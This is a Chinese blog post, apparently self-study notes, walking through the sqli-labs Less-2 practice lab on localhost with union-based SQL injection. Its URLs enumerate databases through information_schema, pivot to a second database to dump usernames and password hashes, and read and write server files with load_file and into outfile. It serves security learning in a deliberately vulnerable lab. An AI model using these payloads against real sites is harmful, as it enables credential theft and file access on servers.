【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)

最新推荐文章于 2024-05-20 16:27:21 发布
最新推荐文章于 2024-05-20 16:27:21 发布
阅读量285 收藏
点赞数
分类专栏: sqli-labs 文章标签: 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/t0410ch/article/details/124627082
版权

查询注入点与第一题不一样,其他都一样,所以试一试跨站注入

若一个网页的注入点使用的是root用户,那么可以使用这个注入点跨库查询其他的数据库。

例如:;使用sqil-labs root用户注入进行跨库攻击:

  1. 在网站后添加id=1发现显示用户名

     

  2. 判断是否是字符注入 http://127.0.0.1/sqli-labs/Less-2/?id=1’

     

  3. 根据报错类型判断可能是int类型:http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=1
    2. 1=2时找不到用户了http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2

       

     

  4. 跨库注入的思路
    1. 找到所有的数据库名 #information_schema(它记录了库名以及表名、列名)
  5. 查询有几列 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 4(报错)

     

  6. Order by 3的时候就不报错了 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3

     

  7. 查询显示位 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3

     

  8.  查看当前数据库的用户,发现是root,则可以进行跨库攻击 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,user(),null

     

  9. 查找数据库的所有数据 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),null from information_schema.schemata
    1. 找到了另一个数据库pikachu

     

  2. 查询pikachu下的表名信息
    1. 查询到有以下表:httpinfo,member,message,users,xssblind

     

  3. 查找pikachu下面的users表(注意加上table_schema='pikachu'——指向数据库pikachu) http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),null from information_schema.columns where table_name='users' and table_schema='pikachu'

     

  4. 查询username与password http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users

     

  5. 对密码进行md5解密:

     

  1. 文件读写操作(危!!!)
    1. load_file(): 读取函数
    2. Into outfile或into dumpfile: 导出函数
  2. 若已知某个盘有某个文件(通过扫描获得,那么就可以直接读取)--(例如已知d盘有version.txt)就能进行读取 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,load_file('d:/version.txt'),null

     

  3. 为d盘下添加一个为“mytest”的“mytest.txt”文件 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,'mytest',3 into outfile 'd:\\mytest.txt' %23
    2. 成功

       

     

  4. Sql注入防护:魔术引导(把想写入的地址使用hex编码)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

Lu&Tian
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入-sqlilabs靶场注入
10-15
通过完成这些卡,你可以理解不同类型的SQL注入漏洞,并学习如何检测和利用它们。 首先,我们要了解SQL注入的基本类型:错误注入、盲注、时间盲注和堆叠查询注入。错误注入是通过触发服务器错误来获取信息,而盲注...
SQLI-LABS 02.第二 【显错注入_数字型不闭合】
weixin_45284414的博客
05-15 294
不需要心单引号闭合,只需要最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。
sql注入sqli-labs靶场-第二
qq_61019688的博客
04-25 282
id=1 and 1=1正常回显,?id=1 and 1=2报错,可知这次是数字型注入(同时注意 =数字型注入后面不用再加--+)1.同第一一样,先判断是何种类型的注入。3.爆数据库名和版本信息。
sqli-labs---第二
最新发布
2201_75556700的博客
05-20 295
5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)id=1 and 1=2 order by 3# 没有报错。id=1 and 1=2 order by 4# 报错。id=1 显示正常。id=1# 显示正常。id=1' 报错。id=1'# 报错。可以知道这里是数字型注入。1、判断是什么类型注入
sqli-labs第二
yuqnqi的博客
05-06 209
sqli-labs第二
SQLI-labs-第二
weixin_54055099的博客
08-29 353
SQLI第二的思路
SQL注入Sqli-labs第二
走马
11-06 597
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。6.一般账号与密码都会存储在users这个表里面,所以我们要去查看users这个表里面的值,为了需要准确的得出账号与密码,可以先对里面的字段进行查询(information_schema.columns表中三列table_schema是数据库名,本次注入sql-labs的第二
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
8. **代码审计**:定期审查代码,查找并修复潜在的SQL注入漏洞。 9. **更新和补丁**:保持数据库管理系统和Web应用程序的最新,安装安全补丁。 在这个压缩包中,sqli-labs-php7可能包含一系列精心设计的练习,旨在...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1787
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
sqli-labs----第二
wyzhxhn的博客
11-05 363
第二
sqli-labs-master第二方法,使用SQL注入查询用户名,密码
weixin_66387649的博客
02-21 653
在学习SQL语句的时候,听朋友推荐,使用sqli-labs-master靶场练习,这里也是用过很长时间把sqli-labs-master环境搭好,现在呢玩到了第二,由于第二和第一的内容基本一样,所以就讲解第二的通方法,遇到的小伙伴一起试一试吧!我们在进行SQL注入时需要查我们的字段数,这里用 order by来找出数据库中的字段数,由于order by的排序特性,我们可以一个一个输入“1,2,3.....”,这样直到它报错就可以知道有几个字段数了。进入卡后发现,这里就已经提示我们开始第一步啦!
Sqli-libs通详解__第二
henghengzhao_的博客
10-05 786
sqli-libs第二详解,一看就会
sqli-labs通笔记第二
m0_66169375的博客
04-22 467
limit后面的第一个参数表示从第几+1行开始查,第二个参数表示查几条数据。11,利用sql爆出username,password列的值。id=1 and 1=1 回显正常,判断为数字型。9,利用sql爆破出user数据表内的列名。6,爆破出security数据库内的表名。7,如果上一步没有爆出数据库名,也可以。id=1 and 1=2回显错误。eg:3,2 第四行,取两行。2,判断注入类型,字符型,数值型。1,传入id=1 查看页面回显。5,爆破出数据库内的数据库名。4,查数据库名和版本号。
SQL注入sqli-labs-master靶场第1、2
qq_24797991的博客
04-04 910
SQL注入
sqli-labs系列——第二
1匹黑马
04-26 4051
文章目录判断注入类型开始注入 判断注入类型 1' and '1'='1 //错误 1 and 1=1 //正常 所以是数字型注入,所以不需要单引号来闭合前边的参数,但是要用-把参数注释掉,让Mysql执行我们后边的exp 开始注入 这里就不一一去爆了,跟第一的流程是一样的,直接上exp干了: http://192.168.1.113:86/Less-2/?id=-1 union SELE...
https://github.com/audi-1/sqli-labs
04-07
这是一个名为SQLi Labs的GitHub仓库,其中包含了一系列用于测试和学习SQL注入的实验室。该仓库由开发者Audi-1维护,其中包括了多个难度级别和不同类型的SQL注入实验,旨在帮助开发者加强SQL注入安全意识和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值